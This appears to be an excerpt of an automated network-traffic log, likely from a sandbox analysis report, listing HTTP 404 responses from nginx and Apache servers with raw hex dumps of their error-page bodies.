        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:46:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:47:04 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:47:07 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:47:10 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:47:12 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:18 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:21 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:24 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:27 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 